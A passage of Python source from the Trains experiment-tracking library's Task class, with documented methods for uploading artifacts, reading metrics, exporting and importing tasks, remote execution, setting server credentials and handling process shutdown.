Get a dictionary containing the Task's registered (dynamically synchronized) artifacts (name, artifact object).
.. note::
After calling ``get_registered_artifacts``, you can still modify the registered artifacts.
:return: The registered (dynamically synchronized) artifacts.
"""
return self._artifacts_manager.registered_artifacts
def upload_artifact(
self,
name, # type: str
artifact_object, # type: Union[str, Mapping, pandas.DataFrame, numpy.ndarray, Image.Image, Any]
metadata=None, # type: Optional[Mapping]
delete_after_upload=False, # type: bool
auto_pickle=True, # type: bool
):
# type: (...) -> bool
"""
Upload (add) a static artifact to a Task object. The artifact is uploaded in the background.
The currently supported upload (static) artifact types include:
- string / pathlib2.Path - A path to an artifact file. If a wildcard or a folder is specified, then Trains
creates and uploads a ZIP file.
- dict - Trains stores a dictionary as ``.json`` file and uploads it.
- pandas.DataFrame - Trains stores a pandas.DataFrame as ``.csv.gz`` (compressed CSV) file and uploads it.
- numpy.ndarray - Trains stores a numpy.ndarray as ``.npz`` file and uploads it.
- PIL.Image - Trains stores a PIL.Image as ``.png`` file and uploads it.
- Any - If called with auto_pickle=True, the object will be pickled and uploaded.
:param str name: The artifact name.
.. warning::
If an artifact with the same name was previously uploaded, then it is overwritten.
:param object artifact_object: The artifact object.
:param dict metadata: A dictionary of key-value pairs for any metadata. This dictionary appears with the
experiment in the **Trains Web-App (UI)**, **ARTIFACTS** tab.
:param bool delete_after_upload: After the upload, delete the local copy of the artifact?
- ``True`` - Delete the local copy of the artifact.
- ``False`` - Do not delete. (default)
:param bool auto_pickle: If True (default) and the artifact_object is not one of the following types:
pathlib2.Path, dict, pandas.DataFrame, numpy.ndarray, PIL.Image, url (string), local_file (string)
then the artifact_object will be pickled and uploaded as a pickle file artifact (with file extension .pkl).
:return: The status of the upload.
- ``True`` - Upload succeeded.
- ``False`` - Upload failed.
:raise: If the artifact object type is not supported, raise a ``ValueError``.
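For example, a minimal usage sketch (assumes ``task`` was returned by ``Task.init``; the artifact names, file path, and values are illustrative):
.. code-block:: py
task.upload_artifact('run configuration', artifact_object={'lr': 0.001})
task.upload_artifact('predictions', artifact_object='predictions.csv', metadata={'split': 'test'})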
"""
return self._artifacts_manager.upload_artifact(
name=name, artifact_object=artifact_object, metadata=metadata,
delete_after_upload=delete_after_upload, auto_pickle=auto_pickle)
def get_models(self):
# type: () -> Dict[str, Sequence[Model]]
"""
Return a dictionary with {'input': [], 'output': []} loaded/stored models of the current Task.
Input models are files loaded in the task, either manually or automatically logged.
Output models are files stored in the task, either manually or automatically logged.
Automatically logged frameworks include, for example: TensorFlow, Keras, PyTorch, ScikitLearn (joblib), etc.
:return: A dictionary with keys input/output, each is list of Model objects.
Example:
.. code-block:: py
{'input': [trains.Model()], 'output': [trains.Model()]}
"""
task_models = {'input': self._get_models(model_type='input'),
'output': self._get_models(model_type='output')}
return task_models
def is_current_task(self):
# type: () -> bool
"""
.. deprecated:: 0.13.0
This method is deprecated. Use :meth:`Task.is_main_task` instead.
Is this Task object the main execution Task (initially returned by :meth:`Task.init`)?
:return: Is this Task object the main execution Task?
- ``True`` - Is the main execution Task.
- ``False`` - Is not the main execution Task.
"""
return self.is_main_task()
def is_main_task(self):
# type: () -> bool
"""
Is this Task object the main execution Task (initially returned by :meth:`Task.init`)?
.. note::
If :meth:`Task.init` was never called, this method will *not* create
it, making this test more efficient than:
.. code-block:: py
Task.init() == task
:return: Is this Task object the main execution Task?
- ``True`` - Is the main execution Task.
- ``False`` - Is not the main execution Task.
"""
return self is self.__main_task
def set_model_config(self, config_text=None, config_dict=None):
# type: (Optional[str], Optional[Mapping]) -> None
"""
.. deprecated:: 0.14.1
Use :meth:`Task.connect_configuration` instead.
"""
self._set_model_config(config_text=config_text, config_dict=config_dict)
def get_model_config_text(self):
# type: () -> str
"""
.. deprecated:: 0.14.1
Use :meth:`Task.connect_configuration` instead.
"""
return self._get_model_config_text()
def get_model_config_dict(self):
# type: () -> Dict
"""
.. deprecated:: 0.14.1
Use :meth:`Task.connect_configuration` instead.
"""
return self._get_model_config_dict()
def set_model_label_enumeration(self, enumeration=None):
# type: (Optional[Mapping[str, int]]) -> ()
"""
Set the label enumeration for the Task object before creating an output model.
Later, when creating an output model, the model will inherit these properties.
:param dict enumeration: A label enumeration dictionary of string (label) to integer (value) pairs.
For example:
.. code-block:: javascript
{
'background': 0,
'person': 1
}
"""
super(Task, self).set_model_label_enumeration(enumeration=enumeration)
def get_last_iteration(self):
# type: () -> int
"""
Get the last reported iteration, which is the last iteration for which the Task reported a metric.
.. note::
The maximum reported iteration is not in the local cache. This method
sends a request to the **Trains Server** (backend).
:return: The last reported iteration number.
"""
self._reload_last_iteration()
return max(self.data.last_iteration, self._reporter.max_iteration if self._reporter else 0)
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set initial iteration, instead of zero. Useful when continuing training from previous checkpoints
:param int offset: Initial iteration (at starting point)
:return: Newly set initial offset.
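For example, a minimal sketch of continuing from the last reported iteration (assumes ``task`` was returned by ``Task.init``):
.. code-block:: py
task.set_initial_iteration(task.get_last_iteration() + 1)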
"""
return super(Task, self).set_initial_iteration(offset=offset)
def get_initial_iteration(self):
# type: () -> int
"""
Return the initial iteration offset; the default is 0.
Useful when continuing training from previous checkpoints.
:return: Initial iteration offset.
"""
return super(Task, self).get_initial_iteration()
def get_last_scalar_metrics(self):
# type: () -> Dict[str, Dict[str, Dict[str, float]]]
"""
Get the last scalar metrics which the Task reported. This is a nested dictionary, ordered by title and series.
For example:
.. code-block:: javascript
{
'title': {
'series': {
'last': 0.5,
'min': 0.1,
'max': 0.9
}
}
}
:return: The last scalar metrics.
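For example, a minimal usage sketch (assumes the Task already reported a scalar with title 'loss' and series 'train'):
.. code-block:: py
metrics = task.get_last_scalar_metrics()
last_train_loss = metrics['loss']['train']['last']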
"""
self.reload()
metrics = self.data.last_metrics
scalar_metrics = dict()
for i in metrics.values():
for j in i.values():
scalar_metrics.setdefault(j['metric'], {}).setdefault(
j['variant'], {'last': j['value'], 'min': j['min_value'], 'max': j['max_value']})
return scalar_metrics
def get_parameters_as_dict(self):
# type: () -> Dict
"""
Get the Task parameters as a raw nested dictionary.
.. note::
The values are not parsed. They are returned as is.
"""
return naive_nested_from_flat_dictionary(self.get_parameters())
def set_parameters_as_dict(self, dictionary):
# type: (Dict) -> None
"""
Set the parameters for the Task object from a dictionary. The dictionary can be nested.
This does not link the dictionary to the Task object. It does a one-time update. This
is the same behavior as the :meth:`Task.connect` method.
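For example, a minimal usage sketch (assumes ``task`` was returned by ``Task.init``; the parameter names are illustrative):
.. code-block:: py
task.set_parameters_as_dict({'optimizer': {'name': 'adam', 'lr': 0.001}})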
"""
self._arguments.copy_from_dict(flatten_dictionary(dictionary))
def execute_remotely(self, queue_name=None, clone=False, exit_process=True):
# type: (Optional[str], bool, bool) -> ()
"""
If task is running locally (i.e., not by ``trains-agent``), then clone the Task and enqueue it for remote
execution; or, stop the execution of the current Task, reset its state, and enqueue it. If ``exit_process=True``,
*exit* this process.
.. note::
If the task is running remotely (i.e., ``trains-agent`` is executing it), this call is a no-op
(i.e., does nothing).
:param queue_name: The queue name used for enqueueing the task. If ``None``, this call exits the process
without enqueuing the task.
:param clone: Clone the Task and execute the newly cloned Task?
The values are:
- ``True`` - A cloned copy of the Task will be created, and enqueued, instead of this Task.
- ``False`` - The Task will be enqueued.
:param exit_process: Exit the calling process at the end of the call?
- ``True`` - Exit the process (exit(0)).
- ``False`` - Do not exit the process.
.. warning::
If ``clone==False``, then ``exit_process`` must be ``True``.
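For example, a minimal usage sketch (assumes ``task`` was returned by ``Task.init`` and a queue named 'default' exists on the server):
.. code-block:: py
task.execute_remotely(queue_name='default')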
"""
# do nothing, we are running remotely
if running_remotely():
return
if not clone and not exit_process:
raise ValueError(
"clone==False and exit_process==False is not supported. "
"Task enqueuing itself must exit the process afterwards.")
# make sure we analyze the process
if self.status in (Task.TaskStatusEnum.in_progress, ):
if clone:
# wait for repository detection (5 minutes should be reasonable time to detect all packages)
self.flush(wait_for_uploads=True)
if self._logger and not self.__is_subprocess():
self._wait_for_repo_detection(timeout=300.)
else:
# close ourselves (it will make sure the repo is updated)
self.close()
# clone / reset Task
if clone:
task = Task.clone(self)
else:
task = self
self.reset()
# enqueue ourselves
if queue_name:
Task.enqueue(task, queue_name=queue_name)
LoggerRoot.get_base_logger().warning(
'Switching to remote execution, output log page {}'.format(task.get_output_log_web_page()))
# leave this process.
if exit_process:
LoggerRoot.get_base_logger().warning('Terminating local execution process')
exit(0)
return
def wait_for_status(
self,
status=(_Task.TaskStatusEnum.completed, _Task.TaskStatusEnum.stopped, _Task.TaskStatusEnum.closed),
raise_on_status=(tasks.TaskStatusEnum.failed,),
check_interval_sec=60.,
):
# type: (Iterable[Task.TaskStatusEnum], Optional[Iterable[Task.TaskStatusEnum]], float) -> ()
"""
Wait for a task to reach a defined status.
:param status: Status to wait for. Defaults to ('completed', 'stopped', 'closed', )
:param raise_on_status: Raise a RuntimeError if the status of the task matches one of these values.
Defaults to ('failed', ).
:param check_interval_sec: Interval in seconds between two checks. Defaults to 60 seconds.
:raise: RuntimeError if the status is one of {raise_on_status}.
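For example, a minimal usage sketch (assumes ``a_task`` is a Task object, for example one returned by ``Task.get_task``):
.. code-block:: py
a_task.wait_for_status(check_interval_sec=30.)
print('Task {} reached status {}'.format(a_task.id, a_task.status))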
"""
stopped_status = list(status) + (list(raise_on_status) if raise_on_status else [])
while self.status not in stopped_status:
time.sleep(check_interval_sec)
if raise_on_status and self.status in raise_on_status:
raise RuntimeError("Task {} has status: {}.".format(self.task_id, self.status))
def export_task(self):
# type: () -> dict
"""
Export Task's configuration into a dictionary (for serialization purposes).
A Task can be copied/modified by calling Task.import_task()
Notice: Export task does not include the task's outputs, such as results
(scalar/plots etc.) or Task artifacts/models
:return: dictionary of the Task's configuration.
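For example, a minimal sketch of saving a Task's configuration to a JSON file (assumes ``task`` is an existing Task object; the file name is illustrative):
.. code-block:: py
import json
exported = task.export_task()
json.dump(exported, open('task_export.json', 'wt'))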
"""
self.reload()
export_data = self.data.to_dict()
export_data.pop('last_metrics', None)
export_data.pop('last_iteration', None)
export_data.pop('status_changed', None)
export_data.pop('status_reason', None)
export_data.pop('status_message', None)
export_data.get('execution', {}).pop('artifacts', None)
export_data.get('execution', {}).pop('model', None)
export_data['project_name'] = self.get_project_name()
return export_data
def update_task(self, task_data):
# type: (dict) -> bool
"""
Update the current task with the configuration found in the ``task_data`` dictionary.
See also export_task() for retrieving Task configuration.
:param task_data: dictionary with full Task configuration
:return: True, if the Task update was successful.
"""
return self.import_task(task_data=task_data, target_task=self, update=True)
@classmethod
def import_task(cls, task_data, target_task=None, update=False):
# type: (dict, Optional[Union[str, Task]], bool) -> bool
"""
Import (create) Task from previously exported Task configuration (see Task.export_task)
Can also be used to edit/update an existing Task (by passing `target_task` and `update=True`).
:param task_data: dictionary of a Task's configuration
:param target_task: Import task_data into an existing Task. Can be either task_id (str) or Task object.
:param update: If True, merge task_data with current Task configuration.
:return: True, if the Task was imported/updated.
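For example, a minimal sketch of re-creating a Task from exported data, and of updating an existing one (assumes ``exported`` is a dictionary returned by ``export_task``; the target task id is illustrative):
.. code-block:: py
Task.import_task(task_data=exported)
Task.import_task(task_data=exported, target_task='112233aabbcc', update=True)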
"""
if not target_task:
project_name = task_data.get('project_name') or Task._get_project_name(task_data.get('project', ''))
target_task = Task.create(project_name=project_name, task_name=task_data.get('name', None))
elif isinstance(target_task, six.string_types):
target_task = Task.get_task(task_id=target_task)
elif not isinstance(target_task, Task):
raise ValueError(
"`target_task` must be either Task id (str) or Task object, "
"received `target_task` type {}".format(type(target_task)))
target_task.reload()
cur_data = target_task.data.to_dict()
cur_data = merge_dicts(cur_data, task_data) if update else task_data
cur_data.pop('id', None)
cur_data.pop('project', None)
# noinspection PyProtectedMember
valid_fields = list(tasks.EditRequest._get_data_props().keys())
cur_data = dict((k, cur_data[k]) for k in valid_fields if k in cur_data)
res = target_task._edit(**cur_data)
if res and res.ok():
target_task.reload()
return True
return False
@classmethod
def set_credentials(cls, api_host=None, web_host=None, files_host=None, key=None, secret=None, host=None):
# type: (Optional[str], Optional[str], Optional[str], Optional[str], Optional[str], Optional[str]) -> ()
"""
Set new default **Trains Server** (backend) host and credentials.
These credentials will be overridden by either OS environment variables, or the Trains configuration
file, ``trains.conf``.
.. warning::
Credentials must be set before initializing a Task object.
For example, to set credentials for a remote computer:
.. code-block:: py
Task.set_credentials(api_host='http://localhost:8008', web_host='http://localhost:8080',
files_host='http://localhost:8081', key='optional_credentials', secret='optional_credentials')
task = Task.init('project name', 'experiment name')
:param str api_host: The API server url. For example, ``host='http://localhost:8008'``
:param str web_host: The Web server url. For example, ``host='http://localhost:8080'``
:param str files_host: The file server url. For example, ``host='http://localhost:8081'``
:param str key: The user key (in the key/secret pair). For example, ``key='thisisakey123'``
:param str secret: The user secret (in the key/secret pair). For example, ``secret='thisisseceret123'``
:param str host: The host URL (overrides api_host). For example, ``host='http://localhost:8008'``
"""
if api_host:
Session.default_host = api_host
if web_host:
Session.default_web = web_host
if files_host:
Session.default_files = files_host
if key:
Session.default_key = key
if not running_remotely():
ENV_ACCESS_KEY.set(key)
if secret:
Session.default_secret = secret
if not running_remotely():
ENV_SECRET_KEY.set(secret)
if host:
Session.default_host = host
Session.default_web = web_host or ''
Session.default_files = files_host or ''
def _set_model_config(self, config_text=None, config_dict=None):
# type: (Optional[str], Optional[Mapping]) -> None
"""
Set Task model configuration text/dict
:param config_text: Model configuration (unconstrained text string). Usually the content
of a configuration file. If `config_text` is not None, `config_dict` must not be provided.
:param config_dict: model configuration parameters dictionary.
If `config_dict` is not None, `config_text` must not be provided.
"""
# noinspection PyProtectedMember
design = OutputModel._resolve_config(config_text=config_text, config_dict=config_dict)
super(Task, self)._set_model_design(design=design)
def _get_model_config_text(self):
# type: () -> str
"""
Get Task model configuration text (before creating an output model)
When an output model is created it will inherit these properties
:return: The model config_text (unconstrained text string).
"""
return super(Task, self).get_model_design()
def _get_model_config_dict(self):
# type: () -> Dict
"""
Get Task model configuration dictionary (before creating an output model)
When an output model is created it will inherit these properties
:return: config_dict: model configuration parameters dictionary.
"""
config_text = self._get_model_config_text()
# noinspection PyProtectedMember
return OutputModel._text_to_config_dict(config_text)
@classmethod
def _reset_current_task_obj(cls):
if not cls.__main_task:
return
task = cls.__main_task
cls.__main_task = None
if task._dev_worker:
task._dev_worker.unregister()
task._dev_worker = None
@classmethod
def _create_dev_task(
cls, default_project_name, default_task_name, default_task_type,
reuse_last_task_id, continue_last_task=False, detect_repo=True,
):
if not default_project_name or not default_task_name:
# get project name and task name from repository name and entry_point
result, _ = ScriptInfo.get(create_requirements=False, check_uncommitted=False)
if not default_project_name:
# noinspection PyBroadException
try:
parts = result.script['repository'].split('/')
default_project_name = (parts[-1] or parts[-2]).replace('.git', '') or 'Untitled'
except Exception:
default_project_name = 'Untitled'
if not default_task_name:
# noinspection PyBroadException
try:
default_task_name = os.path.splitext(os.path.basename(result.script['entry_point']))[0]
except Exception:
pass
# conform reuse_last_task_id and continue_last_task
if continue_last_task and isinstance(continue_last_task, str):
reuse_last_task_id = continue_last_task
continue_last_task = True
# if we force no task reuse from os environment
if DEV_TASK_NO_REUSE.get() or not reuse_last_task_id or isinstance(reuse_last_task_id, str):
default_task = None
else:
# if we have a previous session to use, get the task id from it
default_task = cls.__get_last_used_task_id(
default_project_name,
default_task_name,
default_task_type.value,
)
closed_old_task = False
default_task_id = None
task = None
in_dev_mode = not running_remotely()
if in_dev_mode:
if isinstance(reuse_last_task_id, str) and reuse_last_task_id:
default_task_id = reuse_last_task_id
elif not reuse_last_task_id or not cls.__task_is_relevant(default_task):
default_task_id = None
else:
default_task_id = default_task.get('id') if default_task else None
if default_task_id:
try:
task = cls(
private=cls.__create_protection,
task_id=default_task_id,
log_to_backend=True,
)
# instead of resetting the previously used task, we are continuing the training with it.
if task and continue_last_task:
task.reload()
task.mark_started(force=True)
task.set_initial_iteration(task.get_last_iteration()+1)
else:
task_tags = task.data.system_tags if hasattr(task.data, 'system_tags') else task.data.tags
task_artifacts = task.data.execution.artifacts \
if hasattr(task.data.execution, 'artifacts') else None
if ((str(task._status) in (
str(tasks.TaskStatusEnum.published), str(tasks.TaskStatusEnum.closed)))
or task.output_model_id or (ARCHIVED_TAG in task_tags)
or (cls._development_tag not in task_tags)
or task_artifacts):
# If the task is published or closed, we shouldn't reset it so we can't use it in dev mode
# If the task is archived, or already has an output model,
# we shouldn't use it in development mode either
default_task_id = None
task = None
else:
with task._edit_lock:
# from now on, there is no need to reload, we just clear stuff,
# this flag will be cleared off once we actually refresh at the end of the function
task._reload_skip_flag = True
# reset the task, so we can update it
task.reset(set_started_on_success=False, force=False)
# clear the heaviest stuff first
task._clear_task(
system_tags=[cls._development_tag],
comment=make_message('Auto-generated at %(time)s by %(user)s@%(host)s'))
except (Exception, ValueError):
# we failed reusing task, create a new one
default_task_id = None
# create a new task
if not default_task_id:
task = cls(
private=cls.__create_protection,
project_name=default_project_name,
task_name=default_task_name,
task_type=default_task_type,
log_to_backend=True,
)
# no need to reload yet, we clear this before the end of the function
task._reload_skip_flag = True
if in_dev_mode:
# update this session, for later use
cls.__update_last_used_task_id(default_project_name, default_task_name, default_task_type.value, task.id)
# set default docker image from env.
task._set_default_docker_image()
# mark us as the main Task, there should only be one dev Task at a time.
if not Task.__main_task:
Task.__main_task = task
# mark the task as started
task.started()
# reload, making sure we are synced
task._reload_skip_flag = False
task.reload()
# force update of base logger to this current task (this is the main logger task)
task._setup_log(replace_existing=True)
logger = task.get_logger()
if closed_old_task:
logger.report_text('TRAINS Task: Closing old development task id={}'.format(default_task.get('id')))
# print warning, reusing/creating a task
if default_task_id and not continue_last_task:
logger.report_text('TRAINS Task: overwriting (reusing) task id=%s' % task.id)
elif default_task_id and continue_last_task:
logger.report_text('TRAINS Task: continuing previous task id=%s '
'Notice this run will not be reproducible!' % task.id)
else:
logger.report_text('TRAINS Task: created new task id=%s' % task.id)
# update current repository and put warning into logs
if detect_repo:
# noinspection PyBroadException
try:
import traceback
stack = traceback.extract_stack(limit=10)
# NOTICE WE ARE ALWAYS 3 down from caller in stack!
for i in range(len(stack)-1, 0, -1):
# look for the Task.init call, then the one above it is the callee module
if stack[i].name == 'init':
task._calling_filename = os.path.abspath(stack[i-1].filename)
break
except Exception:
pass
if in_dev_mode and cls.__detect_repo_async:
task._detect_repo_async_thread = threading.Thread(target=task._update_repository)
task._detect_repo_async_thread.daemon = True
task._detect_repo_async_thread.start()
else:
task._update_repository()
# make sure we see something in the UI
thread = threading.Thread(target=LoggerRoot.flush)
thread.daemon = True
thread.start()
return task
def _get_logger(self, flush_period=NotSet):
# type: (Optional[float]) -> Logger
"""
Get a logger object for reporting, based on the task.
:param flush_period: The period of the logger flush.
If None or any other False value, the logger will not flush periodically.
If a logger was created before, this will be the new period and
the old one will be discarded.
:return: Logger object
"""
if not self._logger:
# do not recreate logger after task was closed/quit
if self._at_exit_called:
raise ValueError("Cannot use Task Logger after task was closed")
# force update of base logger to this current task (this is the main logger task)
self._setup_log(replace_existing=self.is_main_task())
# Get a logger object
self._logger = Logger(private_task=self)
# make sure we set our reporter to async mode
# we make sure we flush it in self._at_exit
self.reporter.async_enable = True
# if we just created the logger, set default flush period
if not flush_period or flush_period is self.NotSet:
flush_period = DevWorker.report_period
if isinstance(flush_period, (int, float)):
flush_period = int(abs(flush_period))
if flush_period is None or isinstance(flush_period, int):
self._logger.set_flush_period(flush_period)
return self._logger
def _connect_output_model(self, model):
assert isinstance(model, OutputModel)
model.connect(self)
return model
def _save_output_model(self, model):
"""
Save a reference to the connected output model.
:param model: The connected output model
"""
self._connected_output_model = model
def _reconnect_output_model(self):
"""
If there is a saved connected output model, connect it again.
This is needed if the input model is connected after the output model
is connected, and then we will have to get the model design from the
input model by reconnecting.
"""
if self._connected_output_model:
self.connect(self._connected_output_model)
def _connect_input_model(self, model):
assert isinstance(model, InputModel)
# we only allow for an input model to be connected once
# at least until we support multiple input models
# notice that we do not check the task's input model because we allow task reuse and overwrite
# add into comment that we are using this model
comment = self.comment or ''
if not comment.endswith('\n'):
comment += '\n'
comment += 'Using model id: {}'.format(model.id)
self.set_comment(comment)
if self._last_input_model_id and self._last_input_model_id != model.id:
self.log.info('Task connect, second input model is not supported, adding into comment section')
return
self._last_input_model_id = model.id
model.connect(self)
return model
def _try_set_connected_parameter_type(self, option):
# """ Raise an error if current value is not None and not equal to the provided option value """
# value = self._connected_parameter_type
# if not value or value == option:
# self._connected_parameter_type = option
# return option
#
# def title(option):
# return " ".join(map(str.capitalize, option.split("_")))
#
# raise ValueError(
# "Task already connected to {}. "
# "Task can be connected to only one the following argument options: {}".format(
# title(value),
# ' / '.join(map(title, self._ConnectedParametersType._options())))
# )
# added support for multiple type connections through _Arguments
return option
def _connect_argparse(self, parser, args=None, namespace=None, parsed_args=None):
# do not allow argparser to connect to jupyter notebook
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
# noinspection PyPackageRequirements
from IPython import get_ipython
ip = get_ipython()
if ip is not None and 'IPKernelApp' in ip.config:
return parser
except Exception:
pass
self._try_set_connected_parameter_type(self._ConnectedParametersType.argparse)
if self.is_main_task():
argparser_update_currenttask(self)
if (parser is None or parsed_args is None) and argparser_parseargs_called():
# if we have a parser but not parsed_args, we need to find its parsed_args
if parser and not parsed_args:
for _parser, _parsed_args in get_argparser_last_args():
if _parser == parser:
parsed_args = _parsed_args
break
else:
# prefer the first argparser (hopefully it is the most relevant one)
for _parser, _parsed_args in get_argparser_last_args():
if parser is None:
parser = _parser
if parsed_args is None and parser == _parser:
parsed_args = _parsed_args
if running_remotely() and self.is_main_task():
self._arguments.copy_to_parser(parser, parsed_args)
else:
self._arguments.copy_defaults_from_argparse(
parser, args=args, namespace=namespace, parsed_args=parsed_args)
return parser
def _connect_dictionary(self, dictionary):
def _update_args_dict(task, config_dict):
# noinspection PyProtectedMember
task._arguments.copy_from_dict(flatten_dictionary(config_dict))
def _refresh_args_dict(task, config_dict):
# reread from task including newly added keys
# noinspection PyProtectedMember
a_flat_dict = task._arguments.copy_to_dict(flatten_dictionary(config_dict))
# noinspection PyProtectedMember
nested_dict = config_dict._to_dict()
config_dict.clear()
config_dict.update(nested_from_flat_dictionary(nested_dict, a_flat_dict))
self._try_set_connected_parameter_type(self._ConnectedParametersType.dictionary)
if not running_remotely() or not self.is_main_task():
self._arguments.copy_from_dict(flatten_dictionary(dictionary))
dictionary = ProxyDictPostWrite(self, _update_args_dict, **dictionary)
else:
flat_dict = flatten_dictionary(dictionary)
flat_dict = self._arguments.copy_to_dict(flat_dict)
dictionary = nested_from_flat_dictionary(dictionary, flat_dict)
dictionary = ProxyDictPostWrite(self, _refresh_args_dict, **dictionary)
return dictionary
def _connect_task_parameters(self, attr_class):
self._try_set_connected_parameter_type(self._ConnectedParametersType.task_parameters)
if running_remotely() and self.is_main_task():
attr_class.update_from_dict(self.get_parameters())
else:
self.set_parameters(attr_class.to_dict())
return attr_class
def _validate(self, check_output_dest_credentials=False):
if running_remotely():
super(Task, self)._validate(check_output_dest_credentials=False)
def _output_model_updated(self):
""" Called when a connected output model is updated """
if running_remotely() or not self.is_main_task():
return
# Make sure we know we've started, just in case we didn't so far
self._dev_mode_task_start(model_updated=True)
def _dev_mode_task_start(self, model_updated=False):
""" Called when we suspect the task has started running """
self._dev_mode_setup_worker(model_updated=model_updated)
def _dev_mode_stop_task(self, stop_reason):
# make sure we do not get called (by a daemon thread) after at_exit
if self._at_exit_called:
return
self.log.warning(
"### TASK STOPPED - USER ABORTED - {} ###".format(
stop_reason.upper().replace('_', ' ')
)
)
self.flush(wait_for_uploads=True)
self.stopped()
if self._dev_worker:
self._dev_worker.unregister()
# NOTICE! This will end the entire execution tree!
if self.__exit_hook:
self.__exit_hook.remote_user_aborted = True
self._kill_all_child_processes(send_kill=False)
time.sleep(2.0)
self._kill_all_child_processes(send_kill=True)
# noinspection PyProtectedMember
os._exit(1)
@staticmethod
def _kill_all_child_processes(send_kill=False):
# get the current process id
pid = os.getpid()
try:
parent = psutil.Process(pid)
except psutil.Error:
# could not find parent process id
return
for child in parent.children(recursive=True):
if send_kill:
child.kill()
else:
child.terminate()
# kill ourselves
if send_kill:
parent.kill()
else:
parent.terminate()
def _dev_mode_setup_worker(self, model_updated=False):
if running_remotely() or not self.is_main_task() or self._at_exit_called:
return
if self._dev_worker:
return self._dev_worker
self._dev_worker = DevWorker()
self._dev_worker.register(self)
logger = self.get_logger()
flush_period = logger.get_flush_period()
if not flush_period or flush_period > self._dev_worker.report_period:
logger.set_flush_period(self._dev_worker.report_period)
def _wait_for_repo_detection(self, timeout=None):
# wait for detection repo sync
if not self._detect_repo_async_thread:
return
with self._repo_detect_lock:
if not self._detect_repo_async_thread:
return
# noinspection PyBroadException
try:
if self._detect_repo_async_thread.is_alive():
# if negative timeout, just kill the thread:
if timeout is not None and timeout < 0:
from .utilities.lowlevel.threads import kill_thread
kill_thread(self._detect_repo_async_thread)
else:
self.log.info('Waiting for repository detection and full package requirement analysis')
self._detect_repo_async_thread.join(timeout=timeout)
# because join has no return value
if self._detect_repo_async_thread.is_alive():
self.log.info('Repository and package analysis timed out ({} sec), '
'giving up'.format(timeout))
# done waiting, kill the thread
from .utilities.lowlevel.threads import kill_thread
kill_thread(self._detect_repo_async_thread)
else:
self.log.info('Finished repository detection and package analysis')
self._detect_repo_async_thread = None
except Exception:
pass
def _summary_artifacts(self):
# signal artifacts upload, and stop daemon
self._artifacts_manager.stop(wait=True)
# print artifacts summary (if not empty)
if self._artifacts_manager.summary:
self.get_logger().report_text(self._artifacts_manager.summary)
def _at_exit(self):
# protect sub-process at_exit (should never happen)
if self._at_exit_called:
return
# shutdown will clear the main, so we have to store it before.
# is_main = self.is_main_task()
self.__shutdown()
# In rare cases we might need to forcefully shutdown the process, currently we should avoid it.
# if is_main:
# # we have to forcefully shutdown if we have forked processes, sometimes they will get stuck
# os._exit(self.__exit_hook.exit_code if self.__exit_hook and self.__exit_hook.exit_code else 0)
def __shutdown(self):
"""
Will happen automatically once the code exits, i.e., atexit
:return:
"""
# protect sub-process at_exit
if self._at_exit_called:
return
is_sub_process = self.__is_subprocess()
# noinspection PyBroadException
try:
# from here do not get into watch dog
self._at_exit_called = True
wait_for_uploads = True
# first thing mark task as stopped, so we will not end up with "running" on lost tasks
# if we are running remotely, the daemon will take care of it
task_status = None
wait_for_std_log = True
if not running_remotely() and self.is_main_task() and not is_sub_process:
# check if we crashed, or the signal is not interrupt (manual break)
task_status = ('stopped', )
if self.__exit_hook:
is_exception = self.__exit_hook.exception
# check if we are running inside a debugger
if not is_exception and sys.modules.get('pydevd'):
# noinspection PyBroadException
try:
is_exception = sys.last_type
except Exception:
pass
if (is_exception and not isinstance(self.__exit_hook.exception, KeyboardInterrupt)) \
or (not self.__exit_hook.remote_user_aborted and self.__exit_hook.signal not in (None, 2)):
task_status = ('failed', 'Exception')
wait_for_uploads = False
else:
wait_for_uploads = (self.__exit_hook.remote_user_aborted or self.__exit_hook.signal is None)
if not self.__exit_hook.remote_user_aborted and self.__exit_hook.signal is None and \
not is_exception:
task_status = ('completed', )
else:
task_status = ('stopped', )
# user aborted. do not bother flushing the stdout logs
wait_for_std_log = self.__exit_hook.signal is not None
# wait for repository detection (if we didn't crash)
if wait_for_uploads and self._logger:
# we should print summary here
self._summary_artifacts()
# make sure that if we crashed the thread we are not waiting forever
if not is_sub_process:
self._wait_for_repo_detection(timeout=10.)
# kill the repo thread (negative timeout, do not wait), if it hasn't finished yet.
self._wait_for_repo_detection(timeout=-1)
# wait for uploads
print_done_waiting = False
if wait_for_uploads and (BackendModel.get_num_results() > 0 or
(self._reporter and self.reporter.get_num_results() > 0)):
self.log.info('Waiting to finish uploads')
print_done_waiting = True
# from here, do not send log in background thread
if wait_for_uploads:
self.flush(wait_for_uploads=True)
# wait until the reporter flushes everything
if self._reporter:
self.reporter.stop()
if self.is_main_task():
# notice: this will close the reporting for all the Tasks in the system
Metrics.close_async_threads()
# notice: this will close the jupyter monitoring
ScriptInfo.close()
if self.is_main_task():
# noinspection PyBroadException
try:
from .storage.helper import StorageHelper
StorageHelper.close_async_threads()
except Exception:
pass
if print_done_waiting:
self.log.info('Finished uploading')
elif self._logger:
# noinspection PyProtectedMember
self._logger._flush_stdout_handler()
# from here, do not check worker status
if self._dev_worker:
self._dev_worker.unregister()
self._dev_worker = None
# stop resource monitoring
if self._resource_monitor:
self._resource_monitor.stop()
self._resource_monitor = None
if not is_sub_process:
# change task status
if not task_status:
pass
elif task_status[0] == 'failed':
self.mark_failed(status_reason=task_status[1])
elif task_status[0] == 'completed':
self.completed()
elif task_status[0] == 'stopped':
self.stopped()
if self._logger:
self._logger.set_flush_period(None)
# noinspection PyProtectedMember
self._logger._close_stdout_handler(wait=wait_for_uploads or wait_for_std_log)
# this is so in theory we can close a main task and start a new one
if self.is_main_task():
Task.__main_task = None
except Exception:
# make sure we do not interrupt the exit process
pass
# delete locking object (lock file)
if self._edit_lock:
# noinspection PyBroadException
try:
del self.__edit_lock
except Exception:
pass
self._edit_lock = None
@classmethod
def __register_at_exit(cls, exit_callback, only_remove_signal_and_exception_hooks=False):
class ExitHooks(object):
_orig_exit = None
_orig_exc_handler = None
remote_user_aborted = False
def __init__(self, callback):
self.exit_code = None
self.exception = None
self.signal = None
self._exit_callback = callback
self._org_handlers = {}
self._signal_recursion_protection_flag = False
self._except_recursion_protection_flag = False
def update_callback(self, callback):
if self._exit_callback and not six.PY2:
# noinspection PyBroadException
try:
atexit.unregister(self._exit_callback)
except Exception:
pass
self._exit_callback = callback
if callback:
self.hook()
else:
# unregister the exception hook and signal handlers
if self._orig_exc_handler:
sys.excepthook = self._orig_exc_handler
